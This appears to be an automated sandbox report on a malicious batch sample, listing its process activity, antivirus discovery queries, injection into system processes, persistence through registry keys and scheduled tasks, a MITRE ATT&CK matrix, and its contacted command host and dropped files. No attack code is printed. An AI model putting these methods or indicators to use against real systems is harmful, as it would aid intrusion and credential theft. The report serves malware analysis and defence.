Source: conhost.exe, 00000014.00000002.3002498113.000002BCD5CC0000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001A.00000002.3053496232.000002123BAB0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000027.00000002.3026965971.00000225DCB70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
Source: C:\Windows\System32\cmd.exeCode function: 19_3_00000224138E2AF0 cpuid
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\$rbx-QgS1M4PT VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\$rbx-QgS1M4PT VolumeInformation
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,
Source: C:\Windows\System32\cmd.exeCode function: 19_2_0000022413908090 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
Source: Amcache.hve.10.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.10.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.10.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: dllhost.exe, Amcache.hve.10.dr, Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.50.drBinary or memory string: MsMpEng.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		Valid Accounts12
Windows Management Instrumentation		1
Scripting		1
DLL Side-Loading		1
Deobfuscate/Decode Files or Information		1
Credential API Hooking		1
System Time Discovery		Remote Services1
Archive Collected Data		2
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts12
Native API		1
DLL Side-Loading		1
Access Token Manipulation		1
Obfuscated Files or Information		11
Input Capture		3
File and Directory Discovery		Remote Desktop Protocol1
Credential API Hooking		1
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts22
Command and Scripting Interpreter		11
Scheduled Task/Job		813
Process Injection		1
Software Packing		Security Account Manager132
System Information Discovery		SMB/Windows Admin Shares11
Input Capture		1
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts11
Scheduled Task/Job		31
Registry Run Keys / Startup Folder		11
Scheduled Task/Job		1
DLL Side-Loading		NTDS471
Security Software Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud Accounts1
PowerShell		Network Logon Script31
Registry Run Keys / Startup Folder		1
File Deletion		LSA Secrets2
Process Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
Rootkit		Cached Domain Credentials251
Virtualization/Sandbox Evasion		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
Masquerading		DCSync1
Application Window Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Modify Registry		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt251
Virtualization/Sandbox Evasion		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
Access Token Manipulation		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd813
Process Injection		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task2
Hidden Files and Directories		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1525473 Sample: 1.cmd Startdate: 04/10/2024 Architecture: WINDOWS Score: 100 84 azure-winsecure.com 2->84 96 Malicious sample detected (through community Yara rule) 2->96 98 Multi AV Scanner detection for submitted file 2->98 100 .NET source code references suspicious native API functions 2->100 102 14 other signatures 2->102 13 cmd.exe 1 2->13         started        16 powershell.exe 2->16         started        signatures3 process4 signatures5 132 Suspicious powershell command line found 13->132 134 Suspicious command line found 13->134 18 powershell.exe 37 13->18         started        22 WMIC.exe 1 13->22         started        24 WMIC.exe 1 13->24         started        30 4 other processes 13->30 136 Writes to foreign memory regions 16->136 138 Modifies the context of a thread in another process (thread injection) 16->138 140 Found suspicious powershell code related to unpacking or dynamic code loading 16->140 142 Injects a PE file into a foreign processes 16->142 26 dllhost.exe 16->26         started        28 conhost.exe 16->28         started        process6 file7 80 C:\Windows\$rbx-onimai2\$rbx-CO2.bat, DOS 18->80 dropped 104 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 18->104 106 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 18->106 108 Uses schtasks.exe or at.exe to add and modify task schedules 18->108 116 4 other signatures 18->116 32 cmd.exe 1 18->32         started        35 WerFault.exe 20 16 18->35         started        110 Injects code into the Windows Explorer (explorer.exe) 26->110 112 Contains functionality to inject code into remote processes 26->112 114 Writes to foreign memory regions 26->114 118 3 other signatures 26->118 37 lsass.exe 26->37 injected 39 winlogon.exe 26->39 injected 41 svchost.exe 26->41 injected 43 19 other processes 26->43 signatures8 process9 signatures10 88 Suspicious powershell command line found 32->88 45 powershell.exe 32->45         started        47 conhost.exe 32->47         started        49 cmd.exe 1 32->49         started        90 Writes to foreign memory regions 37->90 process11 process12 51 cmd.exe 1 45->51         started        signatures13 120 Suspicious powershell command line found 51->120 122 Suspicious command line found 51->122 54 powershell.exe 51->54         started        59 WMIC.exe 1 51->59         started        61 WMIC.exe 1 51->61         started        63 4 other processes 51->63 process14 dnsIp15 86 azure-winsecure.com 192.64.119.55, 49835, 49993, 50016 NAMECHEAP-NETUS United States 54->86 82 C:\Users\user\AppData\Roaming\...\2024-10-04, DOS 54->82 dropped 124 Creates autostart registry keys with suspicious values (likely registry only malware) 54->124 126 Creates autostart registry keys with suspicious names 54->126 128 Creates an autostart registry key pointing to binary in C:\Windows 54->128 130 6 other signatures 54->130 65 powershell.exe 54->65         started        68 schtasks.exe 54->68         started        70 WerFault.exe 54->70         started        72 WerFault.exe 54->72         started        file16 signatures17 process18 signatures19 92 Found suspicious powershell code related to unpacking or dynamic code loading 65->92 94 Injects a PE file into a foreign processes 65->94 74 conhost.exe 65->74         started        76 powershell.exe 65->76         started        78 conhost.exe 68->78         started        process20

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
1.cmd4%ReversingLabs
1.cmd15%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
http://upx.sf.net0%URL Reputationsafe
https://aka.ms/pscore60%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/02/trust0%URL Reputationsafe
http://schemas.micro0%URL Reputationsafe
http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
https://aka.ms/pscore680%URL Reputationsafe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd0%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
azure-winsecure.com
192.64.119.55
truefalse
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.2316955445.000001FDC5ABD000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2652633968.000001C2D2BC1000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
      		unknown
      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000024.00000002.2457748410.000001C2C2BDD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000032.00000000.2536368121.000001D5596D8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000002.3076105441.000001D5596D8000.00000004.00000001.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://schemas.xmlsoap.org/ws/2004/09/policylsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
        		unknown
        http://schemas.xmlsoap.org/wsdl/ertieslsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
          		unknown
